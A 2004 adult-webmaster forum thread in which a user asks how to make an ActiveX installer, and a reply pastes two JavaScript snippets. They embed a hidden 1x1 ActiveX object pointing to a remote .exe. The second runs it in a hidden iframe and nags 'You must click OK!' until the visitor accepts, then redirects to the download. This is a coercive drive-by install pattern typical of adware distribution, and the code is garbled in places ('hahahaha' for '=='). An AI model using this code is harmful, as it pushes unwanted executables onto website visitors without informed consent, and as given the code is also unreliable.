Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 09-23-2004, 02:03 PM   #1
pushpills
Confirmed User
 
Join Date: Jan 2004
Location: CHICAGO
Posts: 3,700
How to do an active-x installer?

Looked around on google couldnt find anything too helpfull.


It's going to be for a trial of a piece of software, not for adware/scumware.


Can anyone help me out or point me somewhere?

I'll throw a couple bucks in for the info.


Thanks.
pushpills is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:04 PM   #2
stocktrader23
Let's do some business.
 
stocktrader23's Avatar
 
Industry Role:
Join Date: Jan 2003
Location: The dirty south.
Posts: 18,781
You are a little late. SP2 shit on your parade.
__________________


Hands Free Adult - Join Once, Earn For Life

"I try to make a habit of bouncing my eyes up to the face of a beautiful woman, and often repeat “not mine” in my head or even verbally. She’s not mine. God has her set aside. She’s not mine. She’s His little girl, and she needs me to fight for her by keeping my eyes where they should be."
stocktrader23 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:06 PM   #3
pushpills
Confirmed User
 
Join Date: Jan 2004
Location: CHICAGO
Posts: 3,700
Quote:
Originally posted by stocktrader23
You are a little late. SP2 shit on your parade.

sp2 does not allow those acitve-x installs where you click yes or no?
pushpills is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:15 PM   #4
ztik
Confirmed User
 
ztik's Avatar
 
Industry Role:
Join Date: Aug 2001
Location: Nomad
Posts: 5,196
You need a security certificate then its just a couple lines of ax code
__________________
.
ztik is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:32 PM   #5
pushpills
Confirmed User
 
Join Date: Jan 2004
Location: CHICAGO
Posts: 3,700
Quote:
Originally posted by ztik
You need a security certificate then its just a couple lines of ax code
where do I grab this stuff?
pushpills is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:46 PM   #6
teleblade69
Confirmed User
 
Join Date: Nov 2003
Location: Belgium
Posts: 1,063
LOUDcash


SP2 approved :D




tb


PS : i use it for my cheatsites (platform games)
__________________
teleblade69 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:48 PM   #7
pushpills
Confirmed User
 
Join Date: Jan 2004
Location: CHICAGO
Posts: 3,700
Quote:
Originally posted by teleblade69
LOUDcash


SP2 approved :D




tb


PS : i use it for my cheatsites (platform games)

uhh, i dont want to install your shit, I want to install my piece of software.....
pushpills is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 02:51 PM   #8
Juicy D. Links
So Fucking Banned
 
Industry Role:
Join Date: Apr 2001
Location: N.Y. -Long Island --
Posts: 122,992
my programmer
Juicy D. Links is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 03:02 PM   #9
teleblade69
Confirmed User
 
Join Date: Nov 2003
Location: Belgium
Posts: 1,063
it's just an affiliate program man not a link to install 'my' shit





tb
__________________
teleblade69 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 03:21 PM   #10
hydro
Confirmed User
 
Join Date: Dec 2003
Location: Dirty 3rd
Posts: 4,216
Quote:
Originally posted by teleblade69
it's just an affiliate program man not a link to install 'my' shit





tb
he didnt want a per install affiliate, he wanted the code to do it.

pushpills, some quick code i found through google.


<HTML>
<BODY>
<SCRIPT language="JavaScript">
<!--
var exepath='http://www.site.com/file.exe';
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);

function install() {
if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="Installation_Folder_Name" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
} else {
location.replace(exepath);
}
}

install();

// -->
</SCRIPT>
</BODY>
</HTML>





<HTML>
<BODY>
<SCRIPT language="JavaScript">
<!--
document.write('<iframe id="AX" style="position:absolute; visibilitydden;"></iframe>');

var errcount = 3;
var exepath='http://www.site.com/dir/file.exe';
var errtext='You must click OK!';

var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);

function install() {
if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
BP.document.close();
BP.document.write('<html><body>');
BP.document.write('<object id="LiveFile" onError="parent.retryit();" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
BP.document.write('</body></html>');
} else {
location.replace(exepath);
}
}

function install_First() {
if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="LiveFile" onError="parent.retryit();" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
} else {
location.replace(exepath);
}
}

function retryit(){
if(errcount >0) {
alert(errtext);
install();
errcount --;
} else {
location.replace(exepath);
}
}

install_First();
// -->
</SCRIPT>
</BODY>
</HTML>
hydro is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 09-23-2004, 04:20 PM   #11
pushpills
Confirmed User
 
Join Date: Jan 2004
Location: CHICAGO
Posts: 3,700
hydro, icq me back
pushpills is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.